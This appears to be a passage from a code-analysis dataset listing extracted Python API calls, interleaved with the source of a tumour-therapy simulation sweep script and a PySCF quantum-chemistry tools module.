(3565, 3567), True, 'import matplotlib.pyplot as plt\n'), ((3844, 3897), 'librosa.frames_to_time', 'librosa.frames_to_time', (['beats'], {'sr': 'sr', 'hop_length': 'STEP'}), '(beats, sr=sr, hop_length=STEP)\n', (3866, 3897), False, 'import librosa\n'), ((4261, 4288), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (4271, 4288), True, 'import matplotlib.pyplot as plt\n'), ((4291, 4311), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (4302, 4311), True, 'import matplotlib.pyplot as plt\n'), ((4312, 4340), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram"""'], {}), "('CQT spectrogram')\n", (4321, 4340), True, 'import matplotlib.pyplot as plt\n'), ((4343, 4463), 'librosa.display.specshow', 'librosa.display.specshow', (['M'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'hop_length': 'STEP', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""'}), "(M, y_axis='cqt_hz', sr=sr, hop_length=STEP,\n bins_per_octave=BINS_PER_OCTAVE, x_axis='time')\n", (4367, 4463), False, 'import librosa\n'), ((4462, 4480), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4478, 4480), True, 'import matplotlib.pyplot as plt\n'), ((4622, 4642), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (4633, 4642), True, 'import matplotlib.pyplot as plt\n'), ((4643, 4693), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram synchronized on beats"""'], {}), "('CQT spectrogram synchronized on beats')\n", (4652, 4693), True, 'import matplotlib.pyplot as plt\n'), ((4696, 4818), 'librosa.display.specshow', 'librosa.display.specshow', (['Msync'], {'bins_per_octave': 'BINS_PER_OCTAVE', 'y_axis': '"""cqt_hz"""', 'x_axis': '"""time"""', 'x_coords': 'beat_times'}), "(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis=\n 'cqt_hz', x_axis='time', x_coords=beat_times)\n", (4720, 4818), False, 'import librosa\n'), ((4816, 4834), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4832, 4834), True, 'import matplotlib.pyplot as plt\n'), ((5066, 5093), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (5076, 5093), True, 'import matplotlib.pyplot as plt\n'), ((5096, 5124), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram"""'], {}), "('CQT spectrogram')\n", (5105, 5124), True, 'import matplotlib.pyplot as plt\n'), ((5127, 5253), 'librosa.display.specshow', 'librosa.display.specshow', (['M'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(M, y_axis='cqt_hz', sr=sr, bins_per_octave=\n BINS_PER_OCTAVE, x_axis='time', x_coords=onset_times)\n", (5151, 5253), False, 'import librosa\n'), ((5251, 5269), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5267, 5269), True, 'import matplotlib.pyplot as plt\n'), ((5739, 5766), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (5749, 5766), True, 'import matplotlib.pyplot as plt\n'), ((5769, 5789), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (5780, 5789), True, 'import matplotlib.pyplot as plt\n'), ((5790, 5818), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram"""'], {}), "('CQT spectrogram')\n", (5799, 5818), True, 'import matplotlib.pyplot as plt\n'), ((5821, 5941), 'librosa.display.specshow', 'librosa.display.specshow', (['M'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'hop_length': 'STEP', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""'}), "(M, y_axis='cqt_hz', sr=sr, hop_length=STEP,\n bins_per_octave=BINS_PER_OCTAVE, x_axis='time')\n", (5845, 5941), False, 'import librosa\n'), ((5940, 5958), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5956, 5958), True, 'import matplotlib.pyplot as plt\n'), ((5962, 5982), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (5973, 5982), True, 'import matplotlib.pyplot as plt\n'), ((5983, 6033), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram synchronized on beats"""'], {}), "('CQT spectrogram synchronized on beats')\n", (5992, 6033), True, 'import matplotlib.pyplot as plt\n'), ((6036, 6159), 'librosa.display.specshow', 'librosa.display.specshow', (['Msync'], {'bins_per_octave': 'BINS_PER_OCTAVE', 'y_axis': '"""cqt_hz"""', 'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis=\n 'cqt_hz', x_axis='time', x_coords=onset_times)\n", (6060, 6159), False, 'import librosa\n'), ((6157, 6175), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (6173, 6175), True, 'import matplotlib.pyplot as plt\n'), ((8386, 8408), 'numpy.diag', 'np.diag', (['path_sim'], {'k': '(1)'}), '(path_sim, k=1)\n', (8393, 8408), True, 'import numpy as np\n'), ((8411, 8434), 'numpy.diag', 'np.diag', (['path_sim'], {'k': '(-1)'}), '(path_sim, k=-1)\n', (8418, 8434), True, 'import numpy as np\n'), ((8701, 8734), 'numpy.sum', 'np.sum', (['((deg_path + deg_rec) ** 2)'], {}), '((deg_path + deg_rec) ** 2)\n', (8707, 8734), True, 'import numpy as np\n'), ((9410, 9439), 'numpy.cumsum', 'np.cumsum', (['(evecs ** 2)'], {'axis': '(1)'}), '(evecs ** 2, axis=1)\n', (9419, 9439), True, 'import numpy as np\n'), ((12508, 12535), 'numpy.allclose', 'np.allclose', (['intra_dists', '(0)'], {}), '(intra_dists, 0)\n', (12519, 12535), True, 'import numpy as np\n'), ((12539, 12573), 'numpy.allclose', 'np.allclose', (['centroid_distances', '(0)'], {}), '(centroid_distances, 0)\n', (12550, 12573), True, 'import numpy as np\n'), ((12706, 12730), 'numpy.nanmax', 'np.nanmax', (['score'], {'axis': '(1)'}), '(score, axis=1)\n', (12715, 12730), True, 'import numpy as np\n'), ((14022, 14067), 'numpy.min', 'np.min', (['[onset_times[-1], onset_times[n] + w]'], {}), '([onset_times[-1], onset_times[n] + w])\n', (14028, 14067), True, 'import numpy as np\n'), ((14075, 14120), 'numpy.min', 'np.min', (['[onset_times[-1] - w, onset_times[n]]'], {}), '([onset_times[-1] - w, onset_times[n]])\n', (14081, 14120), True, 'import numpy as np\n'), ((14128, 14178), 'numpy.where', 'np.where', (['((onset_times < t1) & (onset_times >= t2))'], {}), '((onset_times < t1) & (onset_times >= t2))\n', (14136, 14178), True, 'import numpy as np\n'), ((14216, 14233), 'numpy.max', 'np.max', (['C[:, idw]'], {}), '(C[:, idw])\n', (14222, 14233), True, 'import numpy as np\n'), ((14298, 14342), 'numpy.where', 'np.where', (['(C[:, n] > alpha * threshold_chroma)'], {}), '(C[:, n] > alpha * threshold_chroma)\n', (14306, 14342), True, 'import numpy as np\n'), ((14590, 14617), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (14600, 14617), True, 'import matplotlib.pyplot as plt\n'), ((14749, 14859), 'librosa.display.specshow', 'librosa.display.specshow', (['Xsync[:12, :]'], {'y_axis': '"""chroma"""', 'x_axis': '"""time"""', 'x_coords': 'onset_times', 'cmap': '"""OrRd"""'}), "(Xsync[:12, :], y_axis='chroma', x_axis='time',\n x_coords=onset_times, cmap='OrRd')\n", (14773, 14859), False, 'import librosa\n'), ((15388, 15406), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (15404, 15406), True, 'import matplotlib.pyplot as plt\n'), ((16428, 16451), 'librosa.effects.hpss', 'librosa.effects.hpss', (['y'], {}), '(y)\n', (16448, 16451), False, 'import librosa\n'), ((16454, 16516), 'librosa.output.write_wav', 'librosa.output.write_wav', (["(filename + '_harmo.wav')", 'y_harmo', 'sr'], {}), "(filename + '_harmo.wav', y_harmo, sr)\n", (16478, 16516), False, 'import librosa\n'), ((16519, 16581), 'librosa.output.write_wav', 'librosa.output.write_wav', (["(filename + '_percu.wav')", 'y_percu', 'sr'], {}), "(filename + '_percu.wav', y_percu, sr)\n", (16543, 16581), False, 'import librosa\n'), ((16768, 16821), 'librosa.estimate_tuning', 'librosa.estimate_tuning', ([], {'y': 'y', 'sr': 'sr', 'resolution': '(0.001)'}), '(y=y, sr=sr, resolution=0.001)\n', (16791, 16821), False, 'import librosa\n'), ((17032, 17104), 'librosa.feature.mfcc', 'librosa.feature.mfcc', ([], {'y': 'y', 'sr': 'sr', 'n_mfcc': '(20)', 'n_fft': 'NFFT', 'hop_length': 'STEP'}), '(y=y, sr=sr, n_mfcc=20, n_fft=NFFT, hop_length=STEP)\n', (17052, 17104), False, 'import librosa\n'), ((17126, 17153), 'librosa.feature.delta', 'librosa.feature.delta', (['mfcc'], {}), '(mfcc)\n', (17147, 17153), False, 'import librosa\n'), ((17163, 17205), 'numpy.concatenate', 'np.concatenate', (['(mfcc, mfcc_delta)'], {'axis': '(0)'}), '((mfcc, mfcc_delta), axis=0)\n', (17177, 17205), True, 'import numpy as np\n'), ((17267, 17384), 'librosa.feature.chroma_cqt', 'librosa.feature.chroma_cqt', ([], {'y': 'y', 'sr': 'sr', 'n_chroma': '(12)', 'n_octaves': 'N_OCTAVES', 'hop_length': 'STEP', 'norm': 'None', 'tuning': 'A440'}), '(y=y, sr=sr, n_chroma=12, n_octaves=N_OCTAVES,\n hop_length=STEP, norm=None, tuning=A440)\n', (17293, 17384), False, 'import librosa\n'), ((17407, 17436), 'librosa.feature.delta', 'librosa.feature.delta', (['chroma'], {}), '(chroma)\n', (17428, 17436), False, 'import librosa\n'), ((17446, 17492), 'numpy.concatenate', 'np.concatenate', (['(chroma, chroma_delta)'], {'axis': '(0)'}), '((chroma, chroma_delta), axis=0)\n', (17460, 17492), True, 'import numpy as np\n'), ((17583, 17657), 'librosa.feature.spectral_centroid', 'librosa.feature.spectral_centroid', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP)\n', (17616, 17657), False, 'import librosa\n'), ((17675, 17764), 'librosa.feature.spectral_contrast', 'librosa.feature.spectral_contrast', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'n_bands': '(6)', 'hop_length': 'STEP'}), '(y=y, sr=sr, n_fft=NFFT, n_bands=6,\n hop_length=STEP)\n', (17708, 17764), False, 'import librosa\n'), ((17778, 17845), 'librosa.feature.spectral_flatness', 'librosa.feature.spectral_flatness', ([], {'y': 'y', 'n_fft': 'NFFT', 'hop_length': 'STEP'}), '(y=y, n_fft=NFFT, hop_length=STEP)\n', (17811, 17845), False, 'import librosa\n'), ((17864, 17960), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.05)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.05)\n', (17896, 17960), False, 'import librosa\n'), ((17977, 18073), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.25)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.25)\n', (18009, 18073), False, 'import librosa\n'), ((18090, 18185), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.5)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.5)\n', (18122, 18185), False, 'import librosa\n'), ((18203, 18299), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.75)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.75)\n', (18235, 18299), False, 'import librosa\n'), ((18316, 18412), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.95)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.95)\n', (18348, 18412), False, 'import librosa\n'), ((18424, 18537), 'numpy.concatenate', 'np.concatenate', (['(centroid, contrast, flatness, rolloff05, rolloff25, rolloff50, rolloff75,\n rolloff95)'], {'axis': '(0)'}), '((centroid, contrast, flatness, rolloff05, rolloff25,\n rolloff50, rolloff75, rolloff95), axis=0)\n', (18438, 18537), True, 'import numpy as np\n'), ((18545, 18572), 'librosa.feature.delta', 'librosa.feature.delta', (['spec'], {}), '(spec)\n', (18566, 18572), False, 'import librosa\n'), ((18583, 18625), 'numpy.concatenate', 'np.concatenate', (['(spec, spec_delta)'], {'axis': '(0)'}), '((spec, spec_delta), axis=0)\n', (18597, 18625), True, 'import numpy as np\n'), ((18658, 18672), 'numpy.array', 'np.array', (['full'], {}), '(full)\n', (18666, 18672), True, 'import numpy as np\n'), ((18877, 18928), 'numpy.flatnonzero', 'np.flatnonzero', (['(cluster_ids[:-1] != cluster_ids[1:])'], {}), '(cluster_ids[:-1] != cluster_ids[1:])\n', (18891, 18928), True, 'import numpy as np\n'), ((25429, 25454), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""Paired"""', 'k'], {}), "('Paired', k)\n", (25441, 25454), True, 'import matplotlib.pyplot as plt\n'), ((3994, 4013), 'numpy.std', 'np.std', (['beat_period'], {}), '(beat_period)\n', (4000, 4013), True, 'import numpy as np\n'), ((8085, 8114), 'numpy.diff', 'np.diff', (['Msync_normed'], {'axis': '(1)'}), '(Msync_normed, axis=1)\n', (8092, 8114), True, 'import numpy as np\n'), ((13730, 13752), 'numpy.atleast_2d', 'np.atleast_2d', (['seg_ids'], {}), '(seg_ids)\n', (13743, 13752), True, 'import numpy as np\n'), ((15011, 15032), 'numpy.abs', 'np.abs', (['Xsync[12:, :]'], {}), '(Xsync[12:, :])\n', (15017, 15032), True, 'import numpy as np\n'), ((15454, 15481), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (15464, 15481), True, 'import matplotlib.pyplot as plt\n'), ((15568, 15644), 'librosa.display.specshow', 'librosa.display.specshow', (['Xsync[:21, :]'], {'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(Xsync[:21, :], x_axis='time', x_coords=onset_times)\n", (15592, 15644), False, 'import librosa\n'), ((16123, 16141), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (16139, 16141), True, 'import matplotlib.pyplot as plt\n'), ((3972, 3992), 'numpy.mean', 'np.mean', (['beat_period'], {}), '(beat_period)\n', (3979, 3992), True, 'import numpy as np\n'), ((6388, 6501), 'librosa.cqt', 'librosa.cqt', ([], {'y': 'y', 'sr': 'sr', 'bins_per_octave': 'BINS_PER_OCTAVE', 'n_bins': '(N_OCTAVES * BINS_PER_OCTAVE)', 'hop_length': 'STEP'}), '(y=y, sr=sr, bins_per_octave=BINS_PER_OCTAVE, n_bins=N_OCTAVES *\n BINS_PER_OCTAVE, hop_length=STEP)\n', (6399, 6501), False, 'import librosa\n'), ((15818, 15839), 'numpy.abs', 'np.abs', (['Xsync[20:, :]'], {}), '(Xsync[20:, :])\n', (15824, 15839), True, 'import numpy as np\n'), ((19652, 19703), 'scipy.spatial.distance.cosine', 'scipy.spatial.distance.cosine', (['center', 'distance_ref'], {}), '(center, distance_ref)\n', (19681, 19703), False, 'import scipy\n'), ((20087, 20136), 'scipy.spatial.distance.cosine', 'scipy.spatial.distance.cosine', (['center_i', 'center_j'], {}), '(center_i, center_j)\n', (20116, 20136), False, 'import scipy\n'), ((24766, 24799), 'numpy.mean', 'np.mean', (['X[:10 * NFFT, :]'], {'axis': '(0)'}), '(X[:10 * NFFT, :], axis=0)\n', (24773, 24799), True, 'import numpy as np\n'), ((25231, 25255), 'librosa.note_to_hz', 'librosa.note_to_hz', (['"""C1"""'], {}), "('C1')\n", (25249, 25255), False, 'import librosa\n'), ((25311, 25342), 'os.path.splitext', 'os.path.splitext', (['args.filename'], {}), '(args.filename)\n', (25327, 25342), False, 'import sys, os\n'), ((7155, 7165), 'sys.exit', 'sys.exit', ([], {}), '()\n', (7163, 7165), False, 'import sys, os\n'), ((9853, 9879), 'numpy.where', 'np.where', (['(1 - evals > 0.75)'], {}), '(1 - evals > 0.75)\n', (9861, 9879), True, 'import numpy as np\n'), ((10957, 10967), 'sys.exit', 'sys.exit', ([], {}), '()\n', (10965, 10967), False, 'import sys, os\n'), ((9804, 9815), 'numpy.mean', 'np.mean', (['nc'], {}), '(nc)\n', (9811, 9815), True, 'import numpy as np\n'), ((10024, 10049), 'numpy.cumsum', 'np.cumsum', (['(e ** 2)'], {'axis': '(1)'}), '(e ** 2, axis=1)\n', (10033, 10049), True, 'import numpy as np\n'), ((19763, 19799), 'numpy.sum', 'np.sum', (['((center - distance_ref) ** 2)'], {}), '((center - distance_ref) ** 2)\n', (19769, 19799), True, 'import numpy as np\n'), ((20196, 20230), 'numpy.sum', 'np.sum', (['((center_i - center_j) ** 2)'], {}), '((center_i - center_j) ** 2)\n', (20202, 20230), True, 'import numpy as np\n'), ((10717, 10733), 'numpy.argmax', 'np.argmax', (['score'], {}), '(score)\n', (10726, 10733), True, 'import numpy as np\n'), ((10787, 10803), 'numpy.argmin', 'np.argmin', (['score'], {}), '(score)\n', (10796, 10803), True, 'import numpy as np\n'), ((10859, 10875), 'numpy.argmax', 'np.argmax', (['score'], {}), '(score)\n', (10868, 10875), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import common_fn as cf
import seaborn as sns
plt.rcParams["svg.hashsalt"]=0
pre_path='EnvEq/All3/'
parm_format='{:.2e}'
parm_name='therapy_abi-Tneg_initratio-Totcell'
parm_name_array=['Tneg_initratio','Totcell']
post_path1='o2-Null_test-HE/'
parm_name1=parm_name+'/'+post_path1
cf.mkdirs(pre_path=pre_path,parm_name=parm_name1)
#iterator over these
ir_arr=np.logspace(-1,-3,5)
tot_cell_arr=np.array([1000,2000,4000])
cases=['No','AT','AT_nn','MT','SOC']
parms_array=np.empty([0,2])
for ir in ir_arr:
for tc in tot_cell_arr:
parms_array=np.append(parms_array,[[ir,tc]],axis=0)
for case in cases:
post_path=post_path1+case+'-'
cf.timeseries(pre_path=pre_path,parm_name=parm_name,parm_array=parms_array,parm_format=parm_format,post_path=post_path)
df=cf.eq_values(pre_path=pre_path,parm_name=parm_name,parm_array=parms_array,parm_format=parm_format,parm_name_array=parm_name_array,post_path=post_path,ttp=True,limit=9000)
|
[
"common_fn.mkdirs",
"common_fn.eq_values",
"common_fn.timeseries",
"numpy.array",
"numpy.append",
"numpy.empty",
"numpy.logspace"
] |
[((350, 400), 'common_fn.mkdirs', 'cf.mkdirs', ([], {'pre_path': 'pre_path', 'parm_name': 'parm_name1'}), '(pre_path=pre_path, parm_name=parm_name1)\n', (359, 400), True, 'import common_fn as cf\n'), ((429, 451), 'numpy.logspace', 'np.logspace', (['(-1)', '(-3)', '(5)'], {}), '(-1, -3, 5)\n', (440, 451), True, 'import numpy as np\n'), ((463, 491), 'numpy.array', 'np.array', (['[1000, 2000, 4000]'], {}), '([1000, 2000, 4000])\n', (471, 491), True, 'import numpy as np\n'), ((540, 556), 'numpy.empty', 'np.empty', (['[0, 2]'], {}), '([0, 2])\n', (548, 556), True, 'import numpy as np\n'), ((728, 856), 'common_fn.timeseries', 'cf.timeseries', ([], {'pre_path': 'pre_path', 'parm_name': 'parm_name', 'parm_array': 'parms_array', 'parm_format': 'parm_format', 'post_path': 'post_path'}), '(pre_path=pre_path, parm_name=parm_name, parm_array=\n parms_array, parm_format=parm_format, post_path=post_path)\n', (741, 856), True, 'import common_fn as cf\n'), ((855, 1041), 'common_fn.eq_values', 'cf.eq_values', ([], {'pre_path': 'pre_path', 'parm_name': 'parm_name', 'parm_array': 'parms_array', 'parm_format': 'parm_format', 'parm_name_array': 'parm_name_array', 'post_path': 'post_path', 'ttp': '(True)', 'limit': '(9000)'}), '(pre_path=pre_path, parm_name=parm_name, parm_array=parms_array,\n parm_format=parm_format, parm_name_array=parm_name_array, post_path=\n post_path, ttp=True, limit=9000)\n', (867, 1041), True, 'import common_fn as cf\n'), ((622, 664), 'numpy.append', 'np.append', (['parms_array', '[[ir, tc]]'], {'axis': '(0)'}), '(parms_array, [[ir, tc]], axis=0)\n', (631, 664), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
"""
tools module
"""
__author__ = 'Dr. <NAME>, University of Bristol, UK'
__maintainer__ = 'Dr. <NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
import sys
import os
import copy
import numpy as np
try:
import opt_einsum as oe
OE_AVAILABLE = True
except ImportError:
OE_AVAILABLE = False
from subprocess import Popen, PIPE
from pyscf import gto, scf, dft, symm, lib
from pyscf import tools as pyscf_tools
from typing import Tuple, List, Dict, Union
MAX_CYCLE = 100
NATORB_THRES = 1.e-12
class Logger(object):
"""
this class pipes all write statements to both stdout and output_file
"""
def __init__(self, output_file, both=True) -> None:
"""
init Logger
"""
self.terminal = sys.stdout
self.log = open(output_file, 'a')
self.both = both
def write(self, message) -> None:
"""
define write
"""
self.log.write(message)
if self.both:
self.terminal.write(message)
def flush(self) -> None:
"""
define flush
"""
pass
def git_version() -> str:
"""
this function returns the git revision as a string
"""
def _minimal_ext_cmd(cmd):
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = Popen(cmd, stdout=PIPE, env=env, \
cwd=os.path.dirname(__file__)).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = "Unknown"
return GIT_REVISION
def dim(mo_occ: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""
determine molecular dimensions
"""
return np.where(np.abs(mo_occ[0]) > 0.)[0], np.where(np.abs(mo_occ[1]) > 0.)[0]
def mf_info(mf: Union[scf.hf.SCF, dft.rks.KohnShamDFT]) -> Tuple[Tuple[np.ndarray, np.ndarray], \
Tuple[np.ndarray, np.ndarray]]:
"""
retrieve mf information (mo coefficients & occupations)
"""
# mo occupations
if np.asarray(mf.mo_occ).ndim == 1:
mo_occ = (np.ones(np.count_nonzero(0. < mf.mo_occ)), np.ones(np.count_nonzero(1. < mf.mo_occ)))
else:
mo_occ = (mf.mo_occ[0][np.nonzero(mf.mo_occ[0])], mf.mo_occ[1][np.nonzero(mf.mo_occ[1])])
# dimensions
alpha, beta = dim(mo_occ)
# mo coefficients
if np.asarray(mf.mo_coeff).ndim == 2:
mo_coeff = (mf.mo_coeff[:, alpha], mf.mo_coeff[:, beta])
else:
mo_coeff = (mf.mo_coeff[0][:, alpha], mf.mo_coeff[1][:, beta])
return mo_coeff, mo_occ
def orbsym(mol, mo_coeff):
"""
this functions returns orbital symmetries
"""
if isinstance(mo_coeff, np.ndarray):
if mo_coeff.ndim == 2:
try:
orbsymm = symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, mo_coeff)
except:
orbsymm = np.array(['A'] * mo_coeff.shape[1])
else:
try:
orbsymm = np.array([symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, c) for c in mo_coeff])
except:
orbsymm = np.array([['A'] * c.shape[1] for c in mo_coeff])
else:
try:
orbsymm = np.array([symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, c) for c in mo_coeff])
except:
orbsymm = np.array([['A'] * c.shape[1] for c in mo_coeff])
return orbsymm
def make_rdm1(mo: np.ndarray, occup: np.ndarray) -> np.ndarray:
"""
this function returns an 1-RDM (in ao basis) corresponding to given mo(s)
"""
return contract('ip,jp->ij', occup * mo, mo)
def make_natorb(mol: gto.Mole, mo_coeff: np.ndarray, \
rdm1: np.ndarray, thres: float = NATORB_THRES) -> Tuple[Tuple[np.ndarray, np.ndarray], \
Tuple[np.ndarray, np.ndarray]]:
"""
this function returns no coefficients and occupations corresponding
to given mo coefficients and rdm1
"""
# reshape mo_coeff and rdm1
if mo_coeff.ndim == 2:
c = np.asarray((mo_coeff,) * 2)
else:
c = mo_coeff
if rdm1.ndim == 2:
d = np.array([rdm1, rdm1]) * .5
else:
d = rdm1
# overlap matrix
s = mol.intor_symmetric('int1e_ovlp')
# ao to mo transformation of dm
rdm1_mo = contract('xpi,pq,xqr,rs,xsj->xij', c, s, d, s, c)
# diagonalize rdm1_mo
occ_no, u = np.linalg.eigh(rdm1_mo)
# transform to no basis
mo_no = contract('xip,xpj->xij', c, u)
# retain only significant nos
return (mo_no[0][:, np.where(np.abs(occ_no[0]) >= thres)[0]], mo_no[1][:, np.where(np.abs(occ_no[1]) >= thres)[0]]), \
(occ_no[0][np.where(np.abs(occ_no[0]) >= thres)], occ_no[1][np.where(np.abs(occ_no[1]) >= thres)])
def write_rdm1(mol: gto.Mole, part: str, \
mo_coeff: np.ndarray, mo_occ: np.ndarray, fmt: str, \
weights: List[np.ndarray], \
suffix: str = '') -> None:
"""
this function writes a 1-RDM as a numpy or cube (default) file
"""
# assertion
assert part == 'atoms', '`write_rdm1` function only implemented for `atoms` partitioning'
assert fmt in ['cube', 'numpy'], 'fmt arg to `write_rdm1` must be `cube` or `numpy`'
# molecular dimensions
alpha, beta = dim(mo_occ)
# compute total 1-RDM (AO basis)
rdm1_tot = np.array([make_rdm1(mo_coeff[0], mo_occ[0]), make_rdm1(mo_coeff[1], mo_occ[1])])
# loop over atoms
for a in range(mol.natm):
# atom-specific rdm1
rdm1_atom = np.zeros_like(rdm1_tot)
# loop over spins
for i, spin_mo in enumerate((alpha, beta)):
# loop over spin-orbitals
for m, j in enumerate(spin_mo):
# get orbital(s)
orb = mo_coeff[i][:, j].reshape(mo_coeff[i].shape[0], -1)
# orbital-specific rdm1
rdm1_orb = make_rdm1(orb, mo_occ[i][j])
# weighted contribution to rdm1_atom
rdm1_atom[i] += rdm1_orb * weights[i][m][a]
if fmt == 'cube':
# write rdm1_atom as cube file
pyscf_tools.cubegen.density(mol, f'atom_{mol.atom_symbol(a).upper():s}{a:d}_rdm1{suffix:}.cube', \
np.sum(rdm1_atom, axis=0))
else:
# write rdm1_atom as numpy file
np.save(f'atom_{mol.atom_symbol(a).upper():s}{a:d}_rdm1{suffix:}.npy', np.sum(rdm1_atom, axis=0))
def res_add(res_a, res_b):
"""
this function adds two result dictionaries
"""
return {key: res_a[key] + res_b[key] for key in res_a.keys()}
def res_sub(res_a, res_b):
"""
this function subtracts two result dictionaries
"""
return {key: res_a[key] - res_b[key] for key in res_a.keys()}
def contract(eqn, *tensors):
"""
interface to optimized einsum operation
"""
if OE_AVAILABLE:
return oe.contract(eqn, *tensors)
else:
return np.einsum(eqn, *tensors, optimize=True)
|
[
"opt_einsum.contract",
"numpy.abs",
"numpy.asarray",
"os.environ.get",
"numpy.count_nonzero",
"numpy.array",
"numpy.sum",
"os.path.dirname",
"numpy.einsum",
"numpy.nonzero",
"numpy.linalg.eigh",
"pyscf.symm.label_orb_symm",
"numpy.zeros_like"
] |
[((5197, 5220), 'numpy.linalg.eigh', 'np.linalg.eigh', (['rdm1_mo'], {}), '(rdm1_mo)\n', (5211, 5220), True, 'import numpy as np\n'), ((4795, 4822), 'numpy.asarray', 'np.asarray', (['((mo_coeff,) * 2)'], {}), '((mo_coeff,) * 2)\n', (4805, 4822), True, 'import numpy as np\n'), ((6408, 6431), 'numpy.zeros_like', 'np.zeros_like', (['rdm1_tot'], {}), '(rdm1_tot)\n', (6421, 6431), True, 'import numpy as np\n'), ((7891, 7917), 'opt_einsum.contract', 'oe.contract', (['eqn', '*tensors'], {}), '(eqn, *tensors)\n', (7902, 7917), True, 'import opt_einsum as oe\n'), ((7951, 7990), 'numpy.einsum', 'np.einsum', (['eqn', '*tensors'], {'optimize': '(True)'}), '(eqn, *tensors, optimize=True)\n', (7960, 7990), True, 'import numpy as np\n'), ((1464, 1481), 'os.environ.get', 'os.environ.get', (['k'], {}), '(k)\n', (1478, 1481), False, 'import os\n'), ((2591, 2612), 'numpy.asarray', 'np.asarray', (['mf.mo_occ'], {}), '(mf.mo_occ)\n', (2601, 2612), True, 'import numpy as np\n'), ((2940, 2963), 'numpy.asarray', 'np.asarray', (['mf.mo_coeff'], {}), '(mf.mo_coeff)\n', (2950, 2963), True, 'import numpy as np\n'), ((4905, 4927), 'numpy.array', 'np.array', (['[rdm1, rdm1]'], {}), '([rdm1, rdm1])\n', (4913, 4927), True, 'import numpy as np\n'), ((2654, 2687), 'numpy.count_nonzero', 'np.count_nonzero', (['(0.0 < 